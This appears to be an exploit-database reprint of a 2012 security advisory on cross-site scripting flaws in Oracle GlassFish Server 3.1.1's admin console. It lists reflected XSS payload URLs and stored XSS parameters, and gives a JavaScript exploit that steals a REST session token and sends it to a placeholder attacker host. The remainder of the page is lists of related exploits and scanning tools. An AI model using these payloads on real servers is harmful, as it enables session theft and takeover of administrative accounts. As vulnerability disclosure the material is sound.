"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities"

Author

Exploit author

"Roberto Suggi Liverani"

Platform

Exploit platform

windows

Release date

Exploit published date

2012-04-22

                
                    
                         Download file
                    
                
            
Details

Vendor Site: Oracle (www.oracle.com)
Date: April, 19th 2012 – CVE 2012-0551
Affected Software: Oracle GlassFish Server 3.1.1 (build 12)
Researcher: Roberto Suggi Liverani
PDF version: http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_Multiple_XSS.pdf


Description

Security-Assessment.com has discovered that components of the Oracle GlassFish Server administrative web
interface are vulnerable to both reflected  and stored  Cross Site Scripting attacks. All pages where Cross Site
Scripting vulnerabilities were discovered require authentication.

Reflected Cross Site Scripting 

Reflected Cross Site Scripting was discovered in multiple parts of the application. 
The table below details where Reflected Cross Site Scripting was detected and which parameters are vulnerable:

[1] /common/applications/lifecycleEdit.jsf?appName=test%27);alert(document.cookie)//test

[2] /common/security/realms/realms.jsf?configName=default-config%22%29%3balert%281%29//test

[3] /web/grizzly/networkListeners.jsf?configName=default-configad217%22%29%3balert%281%29//test

[4] /common/security/auditModules/auditModules.jsf?configName=904895%22);alert(1);//test

[5] /common/security/jacc/jaccProviders.jsf?configName=904895%22);alert(1);//t

[6] /common/security/msgSecurity/msgSecurity.jsf?configName=904895%22);alert(1);//test

[7] /jms/jmsHosts.jsf?configName=904895%22);alert(1);//test

[8] /web/grizzly/networkListeners.jsf?configName=904895%22);alert(1);//test

[9] /web/grizzly/protocols.jsf?configName=904895%22);alert(1);//test

[10] /web/grizzly/transports.jsf?configName=904895%22);alert(1);//test

[11] /xhp?key=aquarium%27%3b%3Cscript%3Ealert%281%29%3C/script%3E//test    ** Works in Internet Explorer (content sniffing)

Stored Cross Site Scripting

The table below details where Stored Cross Site Scripting was detected and which parameters are vulnerable:

Page Affected	Rendered Page	Method	Variable
[1] /management/domain/create-password-alias - POST - id

[2] /common/appServer/pswdAliasNew.jsf - POST - propertyForm%3ApropertySheet%3ApropertSectionTextField%3AaliasNameNew%3AaliasNameNew
** requires a valid javax.faces.ViewState

Exploitation 

These vulnerabilities can be exploited in several ways. One example is to include an external JavaScript file, 
such as a JavaScript hook file provided by BeEF, the browser exploitation framework. In this particular case, it 
is possible to steal the authentication token through the REST interface, bypassing the HTTPOnly protection adopted for the JSESSIONID token in the standard web administrative interface. 

Bypassing HTTPOnly protection and token theft via REST interface

There is a feature in Oracle Glassfish Server which allows using cookie as a session management mechanism instead of Basic Authentication within the REST interface. 

This feature can be misused using a Cross Site Scripting vulnerability. An exploit scenario for both stored and 
reflected Cross Site Scripting vulnerabilities would be to inject a JavaScript payload which performs an XMLHTTPRequest (XHR) request to retrieve a valid session token via the REST interface. 

The following exploit can be used to retrieve and steal a session token in case a user is authenticated to the REST Interface, using Basic Authentication. The token can only be used with a cookie named gfresttoken within the REST interface.

Bypassing HTTPOnly and Stealing Session Token

function retrieveToken() 
{ 
var xmlhttp; 
if (window.XMLHttpRequest) 
  {// code for IE7+, Firefox, Chrome, Opera, Safari 
  xmlhttp=new XMLHttpRequest(); 
  } 
else 
  {// code for IE6, IE5 
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); 
  } 
xmlhttp.onreadystatechange=function() 
  { 
  if (xmlhttp.readyState==4 && xmlhttp.status==200) 
    {} 
  } 
xmlhttp.open("POST","/management/sessions",true); 
xmlhttp.setRequestHeader("Accept","application/json") 
xmlhttp.send(); 
return xmlhttp; 
} 
  
function stealToken(a) 
{ 
jsonObj = JSON.parse(a.responseText); // token retrieved and can be sent to attacker 
a = document.createElement("IMG"); 
a.setAttribute('src', 'http://attackersite/?token='+jsonObj.extraProperties.token); 
document.body.appendChild(a); // time to grab the token 
} 
  
// this exploit works with browsers that have native JSON support 
  
var a = retrieveToken();// perform XHR to retrieve token 
setTimeout('stealToken(a);',12000); // needs time to load the token, then sends it to 
attackersite 
  
// attacker then needs to set a cookie named gfresttoken with the token value obtained. The 
cookie has to be valid for the domain/IP address of the target Oracle Glassfish Server

Solution

Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory -
April 2012. Security-Assessment.com recommends applying the latest patch provided by the vendor.
For more information, visit: http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2015-04-02	"Kemp Load Master 7.1.16 - Multiple Vulnerabilities"	webapps	multiple	"Roberto Suggi Liverani"
2012-04-22	"Oracle GlassFish Server - REST Cross-Site Request Forgery"	webapps	windows	"Roberto Suggi Liverani"
2012-04-22	"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities"	webapps	windows	"Roberto Suggi Liverani"
2011-10-21	"Opera 11.51 - Use-After-Free Crash (PoC)"	dos	windows	"Roberto Suggi Liverani"
2011-08-11	"Adobe RoboHelp 9 - DOM Cross-Site Scripting"	webapps	cgi	"Roberto Suggi Liverani"
2011-03-11	"Oracle WebLogic - POST Session Fixation"	webapps	multiple	"Roberto Suggi Liverani"
2010-10-20	"Oracle Sun Java System Web Server - HTTP Response Splitting"	webapps	jsp	"Roberto Suggi Liverani"
2010-10-20	"Oracle JRE - java.net.URLConnection class Same-of-Origin 'SOP' Policy Bypass"	remote	windows	"Roberto Suggi Liverani"
2010-02-22	"Adobe (Multiple Products) - XML External Entity / XML Injection"	dos	multiple	"Roberto Suggi Liverani"
2008-10-22	"Opera 9.60 - Persistent Cross-Site Scripting"	remote	windows	"Roberto Suggi Liverani"
2008-04-29	"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure"	webapps	php	"Roberto Suggi Liverani"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Oracle GlassFish Server 3.1.1 (build 12) - Multiple Cross-Site Scripting Vulnerabilities"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.